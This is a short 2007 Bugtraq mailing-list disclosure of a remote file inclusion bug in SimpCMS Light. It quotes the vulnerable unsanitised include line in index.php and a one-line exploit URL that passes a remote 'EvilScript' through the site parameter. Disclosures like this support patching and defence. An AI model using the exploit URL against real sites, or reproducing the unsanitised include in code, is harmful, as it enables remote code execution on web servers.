Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs
New bug :) Apr 11 2007 12:17PM
asdasd asdsadas (dr rover hackermail com)
Bug Found By Dr.RoVeR -->Arab48 Hacker

Contact: Dr.RoVeR (at) HackerMail (dot) CoM [email concealed]
---

Script: SimpCMS Light

Download: http://www.simpcms.com/light/normal/simp-cms-light.zip

--

Bug File: index.php

Bug code in line 31:
include $site.".php";

--

Exploit:
http://site.com/[path]/index.php?site=[EvilScript]

--
_______________________________________________
Get your free email from http://www.hackermail.com

[ reply ]







 

Privacy Statement
Copyright 2009, SecurityFocus